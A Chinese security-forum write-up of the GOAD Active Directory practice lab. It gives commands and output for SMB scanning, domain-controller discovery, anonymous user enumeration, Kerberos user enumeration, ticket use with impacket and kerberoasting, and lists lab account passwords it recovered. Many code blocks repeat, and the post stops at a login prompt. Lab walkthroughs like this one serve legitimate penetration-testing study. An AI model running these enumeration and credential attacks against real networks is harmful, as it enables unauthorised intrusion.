[原创][原创]AD域靶场--GOAD-01-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[原创][原创]AD域靶场--GOAD-01

发表于: 2023-9-13 20:21 2218

[原创][原创]AD域靶场--GOAD-01

hexameron

2023-9-13 20:21

2218

项目地址: https://github.com/Orange-Cyberdefense/GOAD

本文仅更新了部分靶场内容, 一段时间后更新后续.

靶场搭建完毕后, 拓扑如下:

接下来根据域渗透思维导图做对应渗透.

使用cme(crackmapexec)扫描 netbios结果.

获取IP, 主机名称, 所在域, 结果如下:

发现3个域, 详情如下:

存在3个域, 就有三台域控. 微软默认将DC的SMB签名设置为True. (实际环境中可能不存在, 需要其他办法确认域控所在IP)

使用nslookup 查询DNS 枚举域控IP

可得以下信息

north.sevenkingdoms.local

sevenkingdoms.local

essos.local

在linux环境下是用kerberos, 需要修改hosts设置和krb5-user服务设置.

首先我们通过配置/etc/hosts文件来设置DNS

使用UI配置或者直接修改配置文件:

域: north.sevenkingdoms.local DC: 192.168.56.11 (winterfell.north.sevenkingdoms.local) 允许匿名枚举

域: sevenkingdoms.local DC: 192.168.56.10 (kingslanding.sevenkingdoms.local) 不允许匿名枚举

域: essos.local DC: 192.168.56.12 (winterfell.north.sevenkingdoms.local) 不允许匿名枚举

让Chat-Gpt分析一下:

得出结论: 在5分钟内登录失败5次, 账户锁定5分钟.

![FireShot Capture 008 - 密码策略分析 - chat.openai.com](https://images-f.oss-rg-china-mainland.aliyuncs.com/img/FireShot Capture 008 - 密码策略分析 - chat.openai.com.png)

通过枚举域用户组获取完整的域用户列表:

一般情况下, DC不会允许匿名连接. 这时候可以枚举域内密码.

在实验环境中, 前面通过匿名枚举用户获得了一个用户密码 samwell.tarly:Heartsbane 使用该密码可获取全部用户列表

结果如下:

前期获得的用户名如下:

获得账号 brandon.stark:iseedeadpeople

现在NORTH.SEVENKINGDOMS.LOCAL域我们获得了3个账号:

查看密码状态

由于林中存在域名信任, 可以通过LDAP查询其他域信息

查询north.sevenkingdoms.local域用户信息

不知道为毛, 查询失败了..

结果保存在kerberoasting.hashes中

内容如下:

获得账户: jon.snow:iknownothing

结果存储在 records.csv中

cme smb 192.168.56.1/24

SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10.0 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
 
SMB         192.168.56.1    445    PC-20230407XQYM  [*] Windows 10.0 Build 18362 x64 (name:PC-20230407XQYM) (domain:PC-20230407XQYM) (signing:False) (SMBv1:False) ## 靶场宿主机 忽略 
 
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
 
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
 
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
 
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)

SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10.0 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)

SMB         192.168.56.1    445    PC-20230407XQYM  [*] Windows 10.0 Build 18362 x64 (name:PC-20230407XQYM) (domain:PC-20230407XQYM) (signing:False) (SMBv1:False) ## 靶场宿主机 忽略

SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)

SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)

SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)

SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)

nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10

nslookup -type=srv _ldap._tcp.dc._msdcs.essos.local  192.168.56.10

nslookup -type=srv _ldap._tcp.dc._msdcs.north.sevenkingdoms.local  192.168.56.10

nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10

nslookup -type=srv _ldap._tcp.dc._msdcs.essos.local 192.168.56.10

nslookup -type=srv _ldap._tcp.dc._msdcs.north.sevenkingdoms.local 192.168.56.10

# /etc/hosts
# GOAD
168.56.10   sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
168.56.11   winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
168.56.12   essos.local meereen.essos.local meereen
168.56.22   castelblack.north.sevenkingdoms.local castelblack
168.56.23   braavos.essos.local braavos

# /etc/hosts

# GOAD

192.168.56.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding

192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell

192.168.56.12 essos.local meereen.essos.local meereen

192.168.56.22 castelblack.north.sevenkingdoms.local castelblack

192.168.56.23 braavos.essos.local braavos

sudo apt install krb5-user

vi /etc/krb5.conf

[libdefaults]

  default_realm = essos.local

  kdc_timesync = 1

  ccache_type = 4

  forwardable = true

  proxiable = true

  fcc-mit-ticketflags = true
[realms]

  north.sevenkingdoms.local = {

      kdc = winterfell.north.sevenkingdoms.local

      admin_server = winterfell.north.sevenkingdoms.local

  }

  sevenkingdoms.local = {

      kdc = kingslanding.sevenkingdoms.local

      admin_server = kingslanding.sevenkingdoms.local

  }

  essos.local = {

      kdc = meereen.essos.local

      admin_server = meereen.essos.local

  }

[libdefaults]

default_realm = essos.local

kdc_timesync = 1

ccache_type = 4

forwardable = true

proxiable = true

fcc-mit-ticketflags = true

[realms]

north.sevenkingdoms.local = {

kdc = winterfell.north.sevenkingdoms.local

admin_server = winterfell.north.sevenkingdoms.local

}

sevenkingdoms.local = {

kdc = kingslanding.sevenkingdoms.local

admin_server = kingslanding.sevenkingdoms.local

}

essos.local = {

kdc = meereen.essos.local

admin_server = meereen.essos.local

}

impacket-getTGT essos.local/khal.drogo:horse # 测试配置 假设知道密码

export KRB5CCNAME=$(pwd)/khal.drogo.ccache  # 使用TGT票据

impacket-smbclient -k @braavos.essos.local # smb连接

unset KRB5CCNAME # 取消TGT票据使用

impacket-getTGT essos.local/khal.drogo:horse # 测试配置假设知道密码

export KRB5CCNAME=$(pwd)/khal.drogo.ccache # 使用TGT票据

impacket-smbclient -k @braavos.essos.local # smb连接

unset KRB5CCNAME # 取消TGT票据使用

nmap -Pn -p- -sC -sV -oA full_scan_goad 192.168.56.10-12,22-23

...

cme smb <dc-ip> --users

cme smb <dc-ip> --pass-pol

# enum4linux <dc-ip>

enum4linux 192.168.56.11

# enum4linux <dc-ip>

enum4linux 192.168.56.11

rpcclient -U "NORTH\\" 192.168.56.11 -N
enumdomusers
enumdomgroups

rpcclient -U "NORTH\\" 192.168.56.11 -N

enumdomusers

enumdomgroups

net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.56.11' -U '%'

NORTH\Administrator
NORTH\vagrant
NORTH\krbtgt
NORTH\SEVENKINGDOMS$
NORTH\arya.stark
NORTH\eddard.stark
NORTH\catelyn.stark
NORTH\robb.stark
NORTH\sansa.stark
NORTH\brandon.stark
NORTH\rickon.stark
NORTH\hodor
NORTH\jon.snow
NORTH\samwell.tarly
NORTH\jeor.mormont
NORTH\sql_svc

NORTH\Administrator

NORTH\vagrant

NORTH\krbtgt

NORTH\SEVENKINGDOMS$

NORTH\arya.stark

NORTH\eddard.stark

NORTH\catelyn.stark

NORTH\robb.stark

NORTH\sansa.stark

NORTH\brandon.stark

NORTH\rickon.stark

NORTH\hodor

NORTH\jon.snow

NORTH\samwell.tarly

NORTH\jeor.mormont

NORTH\sql_svc

robert.baratheon
tyrion.lannister
cersei.lannister
catelyn.stark
jaime.lannister
daenerys.targaryen
viserys.targaryen
jon.snow
robb.stark
sansa.stark
arya.stark
bran.stark
rickon.stark
joffrey.baratheon
jorah.mormont
theon.greyjoy
samwell.tarly
renly.baratheon
ros
jeor.mormont
gendry
lysa.arryn
robin.arryn
bronn
grand.maester
varys
loras.tyrell
shae
benjen.stark
barristan.selmy
khal.drogo
hodor
lancel.lannister
maester.luwin
alliser.thorne
osha
maester.aemon
talisa.stark
brienne.of
davos.seaworth
tywin.lannister
stannis.baratheon
margaery.tyrell
ygritte
balon.greyjoy
roose.bolton
gilly
podrick.payne
melisandre
yara.greyjoy
jaqen.h’ghar
grey.worm
beric.dondarrion
missandei
mance.rayder
tormund
ramsay.snow
olenna.tyrell
thoros.of
orell
qyburn
brynden.tully
tommen.baratheon
daario.naharis
oberyn.martell
myrcella.baratheon
obara.sand
nym.sand
tyene.sand
high.sparrow
trystane.martell
doran.martell
euron.greyjoy
lady.crane
high.priestess
randyll.tarly
izembaro
brother.ray
archmaester.ebrose

robert.baratheon

tyrion.lannister

cersei.lannister

catelyn.stark

jaime.lannister

daenerys.targaryen

viserys.targaryen

jon.snow

robb.stark

sansa.stark

arya.stark

bran.stark

rickon.stark

joffrey.baratheon

jorah.mormont

theon.greyjoy

samwell.tarly

renly.baratheon

ros

jeor.mormont

gendry

lysa.arryn

robin.arryn

bronn

grand.maester

varys

loras.tyrell

shae

benjen.stark

barristan.selmy

khal.drogo

hodor

lancel.lannister

maester.luwin

alliser.thorne

osha

maester.aemon

talisa.stark

brienne.of

davos.seaworth

tywin.lannister

stannis.baratheon

margaery.tyrell

ygritte

balon.greyjoy

roose.bolton

gilly

podrick.payne

melisandre

yara.greyjoy

jaqen.h’ghar

grey.worm

beric.dondarrion

missandei

mance.rayder

tormund

ramsay.snow

olenna.tyrell

thoros.of

orell

qyburn

brynden.tully

tommen.baratheon

daario.naharis

oberyn.martell

myrcella.baratheon

obara.sand

nym.sand

tyene.sand

high.sparrow

trystane.martell

doran.martell

euron.greyjoy

lady.crane

high.priestess

randyll.tarly

izembaro

brother.ray

archmaester.ebrose

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=user_list.txt" 192.168.56.12

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=user_list.txt" 192.168.56.10

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='north.sevenkingdoms.local',userdb=user_list.txt" 192.168.56.11

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=user_list.txt" 192.168.56.12

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=user_list.txt" 192.168.56.10

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='north.sevenkingdoms.local',userdb=user_list.txt" 192.168.56.11

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-31 18:33 CST

Nmap scan report for essos.local (192.168.56.12)

Host is up (0.00022s latency).
 
PORT   STATE SERVICE

88/tcp open  kerberos-sec

| krb5-enum-users:
| Discovered Kerberos principals
|     daenerys.targaryen@essos.local
|     jorah.mormont@essos.local
|     viserys.targaryen@essos.local
|_    khal.drogo@essos.local

MAC Address: 08:00:27:E6:7A:79 (Oracle VirtualBox virtual NIC)
 

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-31 18:33 CST

Nmap scan report for sevenkingdoms.local (192.168.56.10)

Host is up (0.00026s latency).
 
PORT   STATE SERVICE

88/tcp open  kerberos-sec

| krb5-enum-users:
| Discovered Kerberos principals
|     cersei.lannister@sevenkingdoms.local
|     tywin.lannister@sevenkingdoms.local
|     joffrey.baratheon@sevenkingdoms.local
|     robert.baratheon@sevenkingdoms.local
|     stannis.baratheon@sevenkingdoms.local
|     jaime.lannister@sevenkingdoms.local
|_    renly.baratheon@sevenkingdoms.local

MAC Address: 08:00:27:23:6C:98 (Oracle VirtualBox virtual NIC)
 

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-31 18:33 CST

Nmap scan report for north.sevenkingdoms.local (192.168.56.11)

Host is up (0.00023s latency).
 
PORT   STATE SERVICE

88/tcp open  kerberos-sec

| krb5-enum-users:
| Discovered Kerberos principals
|     jon.snow@north.sevenkingdoms.local
|     arya.stark@north.sevenkingdoms.local
|     samwell.tarly@north.sevenkingdoms.local
|     catelyn.stark@north.sevenkingdoms.local
|     rickon.stark@north.sevenkingdoms.local
|     robb.stark@north.sevenkingdoms.local
|     sansa.stark@north.sevenkingdoms.local
|     jeor.mormont@north.sevenkingdoms.local
|_    hodor@north.sevenkingdoms.local

MAC Address: 08:00:27:91:1B:99 (Oracle VirtualBox virtual NIC)
 

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-31 18:33 CST

Nmap scan report for essos.local (192.168.56.12)

Host is up (0.00022s latency).

PORT STATE SERVICE

88/tcp open kerberos-sec

| krb5-enum-users:

| Discovered Kerberos principals

| daenerys.targaryen@essos.local

| jorah.mormont@essos.local

| viserys.targaryen@essos.local

|_ khal.drogo@essos.local

MAC Address: 08:00:27:E6:7A:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-31 18:33 CST

Nmap scan report for sevenkingdoms.local (192.168.56.10)

Host is up (0.00026s latency).

PORT STATE SERVICE

88/tcp open kerberos-sec

| krb5-enum-users:

| Discovered Kerberos principals

| cersei.lannister@sevenkingdoms.local

| tywin.lannister@sevenkingdoms.local

| joffrey.baratheon@sevenkingdoms.local

| robert.baratheon@sevenkingdoms.local

| stannis.baratheon@sevenkingdoms.local

| jaime.lannister@sevenkingdoms.local

|_ renly.baratheon@sevenkingdoms.local

MAC Address: 08:00:27:23:6C:98 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-31 18:33 CST

Nmap scan report for north.sevenkingdoms.local (192.168.56.11)

Host is up (0.00023s latency).

PORT STATE SERVICE

88/tcp open kerberos-sec

| krb5-enum-users:

| Discovered Kerberos principals

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

最后于 2023-9-13 20:36 被hexameron编辑，原因：内容补充

收藏・4

免费・2

支持

最新回复 (2)
秋狝雪币： 3059 活跃值： (30876) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1568 粉丝 38 关注私信	秋狝 2 楼感谢分享 2023-9-14 09:45 1
Skiner01 雪币： 27 活跃值： (27) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 16 粉丝 0 关注私信	Skiner01 3 楼很不错，也可以在域计算机上使用Bloodhound来更快地获得AD信息。如果这个靶场里能加入不同子域的话那就更棒了。毕竟在企业渗透测试中端口转发以及中继攻击也是很重要的。 2023-9-29 22:03 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

hexameron

发帖

回帖

RANK

关注

私信

他的文章

[原创][原创]AD域靶场--GOAD-01 2219

关于我们

联系我们

企业服务

看雪公众号

最新回复 (2)
秋狝雪币： 3059 活跃值： (30876) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1568 粉丝 38 关注私信	秋狝 2 楼感谢分享 2023-9-14 09:45 1
Skiner01 雪币： 27 活跃值： (27) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 16 粉丝 0 关注私信	Skiner01 3 楼很不错，也可以在域计算机上使用Bloodhound来更快地获得AD信息。如果这个靶场里能加入不同子域的话那就更棒了。毕竟在企业渗透测试中端口转发以及中继攻击也是很重要的。 2023-9-29 22:03 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复